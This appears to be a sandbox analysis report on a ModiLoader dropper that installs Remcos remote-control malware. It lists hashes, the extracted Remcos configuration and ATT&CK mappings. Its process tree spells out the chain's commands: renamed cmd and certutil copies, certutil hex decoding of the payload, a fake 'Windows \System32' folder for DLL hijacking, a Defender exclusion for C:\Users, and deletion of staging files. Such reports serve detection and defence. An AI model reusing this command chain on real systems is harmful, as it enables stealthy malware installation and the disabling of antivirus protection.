Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-04-2024 08:58

General

  • Target

    ref_00291882384892.cmd

  • Size

    4.3MB

  • MD5

    23f87d5ed3ef12efda90bf6ba82e2bd6

  • SHA1

    ec451f0de91170a6702547159ef9d189c85d1018

  • SHA256

    c3cffa55b7f7c7f80dd9302c3796b7bce79102ae75e4592d84d165aadf9c0743

  • SHA512

    d849eccfe99697ebeb058f7817af13873e3eeb73fcb78ad8eeb5a6fec89b269533a6e296d53625e69546fce6e0e6942ebe8cb08f5db0a5aadaad3ff23719cd53

  • SSDEEP

    49152:fHZjpt3K90OHGHS/jltrYcZ4t6CgGP9KUJM0tDNm5Rg4/VuqK1BdeW9e6P:9

Malware Config

Extracted

Family

remcos

Botnet

Future2025

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remi

  • mouse_option

    false

  • mutex

    Rmc-RFUXJL

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3980
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:2484
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5108
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:2180
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2244
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\ref_00291882384892.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
            3⤵
            • Executes dropped EXE
            PID:1160
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
            3⤵
            • Executes dropped EXE
            PID:3988
        • C:\Users\Public\Libraries\sppsvc.pif
          C:\Users\Public\Libraries\sppsvc.pif
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4696
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:604
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:1652
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:1656
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:2344
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:2780
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:2180
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:4460
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3412
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1160
                      • C:\Windows\System32\extrac32.exe
                        C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
                        6⤵
                          PID:4628
                        • C:\Users\Public\alpha.exe
                          C:\\Users\\Public\\alpha /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:1608
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                            7⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4956
                  • C:\Windows\SysWOW64\extrac32.exe
                    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF
                    3⤵
                      PID:3584
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:2156
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                    2⤵
                    • Executes dropped EXE
                    PID:3296

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Persistence

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Privilege Escalation

                Boot or Logon Autostart Execution

                1
                T1547

                Registry Run Keys / Startup Folder

                1
                T1547.001

                Defense Evasion

                Modify Registry

                1
                T1112

                Discovery

                Query Registry

                1
                T1012

                System Information Discovery

                1
                T1082

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\remi\logs.dat
                  Filesize

                  144B

                  MD5

                  4b4bcb1b3bdf550cbe8fc25e77ae9bd3

                  SHA1

                  9d2f47f012f81b0b13c661737f1fdef34abc6e4e

                  SHA256

                  f27ffebe8862c4c3152138a1b10e43d6bce2afdeceeafa51c67dfcdcf334c08d

                  SHA512

                  d38dcc1d8899a1bb8046634383ed8a7f2432ee3d0657cabfd76e18cf755097c463c706b23e0ef74979be503e768da32675221a580f9d28d18ed2268d81201d82

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bafhu3uk.4ih.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Public\Libraries\MywiztwuO.bat
                  Filesize

                  29KB

                  MD5

                  828ffbf60677999579dafe4bf3919c63

                  SHA1

                  a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                  SHA256

                  abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                  SHA512

                  bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

                • C:\Users\Public\Libraries\aaa.bat
                  Filesize

                  3KB

                  MD5

                  71e46efe9932b83b397b44052513fb49

                  SHA1

                  741af3b8c31095a0cc2c39c41e62279684913205

                  SHA256

                  11c20fabf677cd77e8a354b520f6ffca09cac37ce15c9932550e749e49efe08a

                  SHA512

                  76da3b441c0eaaaabdd4d21b0a3d4aa7fd49d73a5f0dab2cfb39f2e114efe4f4dabe2d46b01b66d810d6e0efa97676599ece5c213c1a69a5f2f4897a9b4ac8da

                • C:\Users\Public\Libraries\easinvoker.exe
                  Filesize

                  128KB

                  MD5

                  231ce1e1d7d98b44371ffff407d68b59

                  SHA1

                  25510d0f6353dbf0c9f72fc880de7585e34b28ff

                  SHA256

                  30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                  SHA512

                  520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

                • C:\Users\Public\Libraries\netutils.dll
                  Filesize

                  114KB

                  MD5

                  566b326055c3ed8e2028aa1e2c1054d0

                  SHA1

                  c25fa6d6369c083526cafcf45b5f554635afe218

                  SHA256

                  a692d4305b95e57e2cfc871d53a41a5bfc9e306cb1a86ca1159db4f469598714

                  SHA512

                  da4b0b45d47757b69f9abc1817d3cb3c85deb08658e55f07b016fba053efe541a5791b9b2b380c25b440bbae6916c5a2245261553ca3c5025d9d55c943f9823c

                • C:\Users\Public\Libraries\sppsvc.pif
                  Filesize

                  1.6MB

                  MD5

                  5dc72c0758be865d60ec49da3b18ada6

                  SHA1

                  e8f1248535ccb846a25f7cabe6cdd561343854dd

                  SHA256

                  18ed0f120637017977b5f606feac6bca90a5cf28839f98c35b6ff3e9b4a0d01f

                  SHA512

                  0d4a8d2c01ef7d56bd379c294ff976db61e1ff9fbf56b6c2c1835c8a706954555b8a03fb35b8d21881686363d30ed39f4b2a3a68b9f40a97bcfd60774b53f53e

                • C:\Users\Public\alpha.exe
                  Filesize

                  283KB

                  MD5

                  8a2122e8162dbef04694b9c3e0b6cdee

                  SHA1

                  f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                  SHA256

                  b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                  SHA512

                  99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

                • C:\Users\Public\kn.exe
                  Filesize

                  1.6MB

                  MD5

                  bd8d9943a9b1def98eb83e0fa48796c2

                  SHA1

                  70e89852f023ab7cde0173eda1208dbb580f1e4f

                  SHA256

                  8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                  SHA512

                  95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

                • C:\Users\Public\sppsvc.rtf
                  Filesize

                  3.1MB

                  MD5

                  dae8075cb28bc2772caf6ff7eaecf90b

                  SHA1

                  9153b65e9e1b58039a1efc37a26276f03ffd1c28

                  SHA256

                  aebd8a641bf4d2394e1e94f4e2b285f5dae110d68a7a0c524c4261c34b7aad91

                  SHA512

                  81632d9ba844b047a5fb9f32c5543bbe6e7fed68e14e7e530d380001b0a368892f21cf3f3875c9334137ed3423b1c37b9e143042951e19a1daaa8ffa2c35f434

                • memory/3412-52-0x00000000613C0000-0x00000000613E3000-memory.dmp
                  Filesize

                  140KB

                • memory/4696-80-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-110-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-133-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-32-0x0000000000400000-0x0000000000598000-memory.dmp
                  Filesize

                  1.6MB

                • memory/4696-132-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-122-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-121-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-111-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-29-0x0000000002FD0000-0x0000000003FD0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-83-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-84-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-85-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-86-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-87-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-88-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-92-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-30-0x0000000002FD0000-0x0000000003FD0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-99-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-100-0x00000000158E0000-0x00000000168E0000-memory.dmp
                  Filesize

                  16.0MB

                • memory/4696-28-0x0000000000890000-0x0000000000891000-memory.dmp
                  Filesize

                  4KB

                • memory/4956-74-0x00007FFF3DBC0000-0x00007FFF3E681000-memory.dmp
                  Filesize

                  10.8MB

                • memory/4956-71-0x000001F11E270000-0x000001F11E280000-memory.dmp
                  Filesize

                  64KB

                • memory/4956-70-0x000001F11E270000-0x000001F11E280000-memory.dmp
                  Filesize

                  64KB

                • memory/4956-69-0x00007FFF3DBC0000-0x00007FFF3E681000-memory.dmp
                  Filesize

                  10.8MB

                • memory/4956-64-0x000001F11E1D0000-0x000001F11E1F2000-memory.dmp
                  Filesize

                  136KB